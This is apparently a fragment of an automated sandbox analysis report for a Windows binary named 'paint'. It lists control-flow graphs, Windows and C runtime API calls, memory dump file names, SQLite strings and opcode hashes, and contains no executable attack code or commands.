7ff6f0bf5e07-7ff6f0bf5e0b 795->798 796->793 801 7ff6f0bf5e8c-7ff6f0bf5e90 798->801 802 7ff6f0bf5e0d-7ff6f0bf5e35 call 7ff6f0be6bc8 798->802 804 7ff6f0bf5e92-7ff6f0bf5e94 801->804 805 7ff6f0bf5e97-7ff6f0bf5ea4 801->805 810 7ff6f0bf5e53-7ff6f0bf5e57 802->810 811 7ff6f0bf5e37 802->811 804->805 806 7ff6f0bf5ebf-7ff6f0bf5ece call 7ff6f0bf55f0 call 7ff6f0bf55e0 805->806 807 7ff6f0bf5ea6-7ff6f0bf5ebc call 7ff6f0bf5b8c 805->807 806->677 807->806 810->801 816 7ff6f0bf5e59-7ff6f0bf5e77 call 7ff6f0be6bc8 810->816 814 7ff6f0bf5e3a-7ff6f0bf5e41 811->814 814->810 817 7ff6f0bf5e43-7ff6f0bf5e51 814->817 822 7ff6f0bf5e83-7ff6f0bf5e8a 816->822 817->810 817->814 822->801 823 7ff6f0bf5e79-7ff6f0bf5e7d 822->823 823->801 824 7ff6f0bf5e7f 823->824 824->822
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5CB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF561C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: HeapFree.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6F0BEA94F,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEA979
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6F0BEA94F,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEA99E
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5CA4
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF567C
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F1A
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F2B
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F3C
                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F0BF617C), ref: 00007FF6F0BF5F63
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                                • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                                                • Instruction ID: 69cd1c9e8cec580f86320ee8c94abef9dfe5dd09a0da2057a5d6ddb0f22e9c31
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65D1D03AA0820266EB20AF61D8411B96769EF56795FC08035EE2EC77D6FF3EE4418340

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 945 7ff6f0bf69d4-7ff6f0bf6a47 call 7ff6f0bf6708 948 7ff6f0bf6a61-7ff6f0bf6a6b call 7ff6f0be8590 945->948 949 7ff6f0bf6a49-7ff6f0bf6a52 call 7ff6f0be4f58 945->949 955 7ff6f0bf6a6d-7ff6f0bf6a84 call 7ff6f0be4f58 call 7ff6f0be4f78 948->955 956 7ff6f0bf6a86-7ff6f0bf6aef CreateFileW 948->956 954 7ff6f0bf6a55-7ff6f0bf6a5c call 7ff6f0be4f78 949->954 971 7ff6f0bf6da2-7ff6f0bf6dc2 954->971 955->954 957 7ff6f0bf6af1-7ff6f0bf6af7 956->957 958 7ff6f0bf6b6c-7ff6f0bf6b77 GetFileType 956->958 961 7ff6f0bf6b39-7ff6f0bf6b67 GetLastError call 7ff6f0be4eec 957->961 962 7ff6f0bf6af9-7ff6f0bf6afd 957->962 964 7ff6f0bf6bca-7ff6f0bf6bd1 958->964 965 7ff6f0bf6b79-7ff6f0bf6bb4 GetLastError call 7ff6f0be4eec CloseHandle 958->965 961->954 962->961 969 7ff6f0bf6aff-7ff6f0bf6b37 CreateFileW 962->969 967 7ff6f0bf6bd3-7ff6f0bf6bd7 964->967 968 7ff6f0bf6bd9-7ff6f0bf6bdc 964->968 965->954 980 7ff6f0bf6bba-7ff6f0bf6bc5 call 7ff6f0be4f78 965->980 975 7ff6f0bf6be2-7ff6f0bf6c37 call 7ff6f0be84a8 967->975 968->975 976 7ff6f0bf6bde 968->976 969->958 969->961 983 7ff6f0bf6c39-7ff6f0bf6c45 call 7ff6f0bf6910 975->983 984 7ff6f0bf6c56-7ff6f0bf6c87 call 7ff6f0bf6488 975->984 976->975 980->954 983->984 992 7ff6f0bf6c47 983->992 990 7ff6f0bf6c8d-7ff6f0bf6ccf 984->990 991 7ff6f0bf6c89-7ff6f0bf6c8b 984->991 994 7ff6f0bf6cf1-7ff6f0bf6cfc 990->994 995 7ff6f0bf6cd1-7ff6f0bf6cd5 990->995 993 7ff6f0bf6c49-7ff6f0bf6c51 call 7ff6f0beab30 991->993 992->993 993->971 997 7ff6f0bf6d02-7ff6f0bf6d06 994->997 998 7ff6f0bf6da0 994->998 995->994 996 7ff6f0bf6cd7-7ff6f0bf6cec 995->996 996->994 997->998 1000 7ff6f0bf6d0c-7ff6f0bf6d51 CloseHandle CreateFileW 997->1000 998->971 1002 7ff6f0bf6d53-7ff6f0bf6d81 GetLastError call 7ff6f0be4eec call 7ff6f0be86d0 1000->1002 1003 7ff6f0bf6d86-7ff6f0bf6d9b 1000->1003 1002->1003 1003->998
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                • Instruction ID: 38828b328dd74633a06efc509083ae11ea937120d790e1ddf9eecf71d5b71c3f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFC1E13AB28A4295EB10CFA4C4916AC3769FB4AB98B415235DE2FD77D5EF3AD411C300

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1538 7ff6f0bf5eec-7ff6f0bf5f21 call 7ff6f0bf55f8 call 7ff6f0bf5600 call 7ff6f0bf5668 1545 7ff6f0bf605f-7ff6f0bf60cd call 7ff6f0bea970 call 7ff6f0bf15e8 1538->1545 1546 7ff6f0bf5f27-7ff6f0bf5f32 call 7ff6f0bf5608 1538->1546 1558 7ff6f0bf60cf-7ff6f0bf60d6 1545->1558 1559 7ff6f0bf60db-7ff6f0bf60de 1545->1559 1546->1545 1551 7ff6f0bf5f38-7ff6f0bf5f43 call 7ff6f0bf5638 1546->1551 1551->1545 1557 7ff6f0bf5f49-7ff6f0bf5f6c call 7ff6f0bea9b8 GetTimeZoneInformation 1551->1557 1570 7ff6f0bf6034-7ff6f0bf605e call 7ff6f0bf55f0 call 7ff6f0bf55e0 call 7ff6f0bf55e8 1557->1570 1571 7ff6f0bf5f72-7ff6f0bf5f93 1557->1571 1563 7ff6f0bf616b-7ff6f0bf616e 1558->1563 1561 7ff6f0bf6115-7ff6f0bf6128 call 7ff6f0bed66c 1559->1561 1562 7ff6f0bf60e0 1559->1562 1576 7ff6f0bf6133-7ff6f0bf614e call 7ff6f0bf15e8 1561->1576 1577 7ff6f0bf612a 1561->1577 1566 7ff6f0bf60e3 1562->1566 1565 7ff6f0bf6174-7ff6f0bf617c call 7ff6f0bf5c70 1563->1565 1563->1566 1572 7ff6f0bf60e8-7ff6f0bf6114 call 7ff6f0bea9b8 call 7ff6f0bdc5c0 1565->1572 1566->1572 1573 7ff6f0bf60e3 call 7ff6f0bf5eec 1566->1573 1579 7ff6f0bf5f95-7ff6f0bf5f9b 1571->1579 1580 7ff6f0bf5f9e-7ff6f0bf5fa5 1571->1580 1573->1572 1597 7ff6f0bf6155-7ff6f0bf6167 call 7ff6f0bea9b8 1576->1597 1598 7ff6f0bf6150-7ff6f0bf6153 1576->1598 1585 7ff6f0bf612c-7ff6f0bf6131 call 7ff6f0bea9b8 1577->1585 1579->1580 1581 7ff6f0bf5fb9 1580->1581 1582 7ff6f0bf5fa7-7ff6f0bf5faf 1580->1582 1589 7ff6f0bf5fbb-7ff6f0bf602f call 7ff6f0bfa540 * 4 call 7ff6f0bf2bcc call 7ff6f0bf6184 * 2 1581->1589 1582->1581 1587 7ff6f0bf5fb1-7ff6f0bf5fb7 1582->1587 1585->1562 1587->1589 1589->1570 1597->1563 1598->1585
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F1A
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF567C
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F2B
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF561C
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F3C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF564C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: HeapFree.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8
                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F0BF617C), ref: 00007FF6F0BF5F63
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                                • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                                                • Instruction ID: 61beec96e97131efd3c013a54083263a9fac423be72d3eb15e6dbd9ada95775e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B951C03AA08642A6E720EF71D9811A96768BF59784FC09135EA6EC77D2FF3DE4008740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2014939078.00007FFDFB029000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAB20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013832567.00007FFDFAB20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAB21000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAB32000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAB42000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAB48000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAB92000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFABA7000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFABB7000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFABBE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFABCC000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFADAE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAE99000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAE9B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAED2000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAF0F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFAFDB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFB010000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013861786.00007FFDFB023000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2014972970.00007FFDFB02A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfab20000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                • String ID: )tP
                                                                                                                                                                                                                                                                • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                                                                • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                                • Instruction ID: a94b0584e2db536b9d84207e458638f7668ad69a9f5287f9d326c9aa4e9267f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA62282272919286E7158F38D5106BD77E0F749786F045532EEAEC37D8EA3CEA49D700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                                                • API String ID: 4225454184-1046679716
                                                                                                                                                                                                                                                                • Opcode ID: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
                                                                                                                                                                                                                                                                • Instruction ID: e4b0b5e2de52c4d5b39eb3d202f1dc8feb9e8110bdcf37ba334f242c81bea34f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDF19822B0A68386EB24DF219434BBE6790FB86B88F084535DA5D077E9DF7CE5419740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2016511433.00007FFDFB892000.00000080.00000001.01000000.00000005.sdmp, Offset: 00007FFDFB1E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015733391.00007FFDFB1E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB1E1000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB484000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB48F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB505000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB6D1000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB6D4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB7CF000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB7D9000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB851000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015768208.00007FFDFB885000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016544721.00007FFDFB893000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb1e0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                • Opcode ID: 20bc69a4286804e3faafccbb8ca4eb16e2df685c1e5aaf2263807ad93f74b24b
                                                                                                                                                                                                                                                                • Instruction ID: 317e18f88d8d32b3f417d0368fc23e979a4705c916aecd9d0f10acad6f45b707
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20bc69a4286804e3faafccbb8ca4eb16e2df685c1e5aaf2263807ad93f74b24b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F62292273919786FB159F38D4106BD7A90F788B89F045531EAAED37D8E63CEA45C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: :memory:
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2920599690
                                                                                                                                                                                                                                                                • Opcode ID: 3d2ec196a22088dfc73d8977262f4631dc352476567c5fa5db6760948f71a506
                                                                                                                                                                                                                                                                • Instruction ID: c5137fcdaee127001dd430ec84e897f7fd849c40ad13cdca2e643f990df39835
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d2ec196a22088dfc73d8977262f4631dc352476567c5fa5db6760948f71a506
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E426162F0AB8386EB659F15A460B7967A0FF56B48F048135CA6E037F9DF3CE5949300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                • Instruction ID: fbfd0f38adec2e3a5c335ca5765c14d5955c3f924ee9959431f62da887e86d82
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F0C866A19742C6F7A08BA0B459766B351AB89338F840335DA7E427D4EF3CD049CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
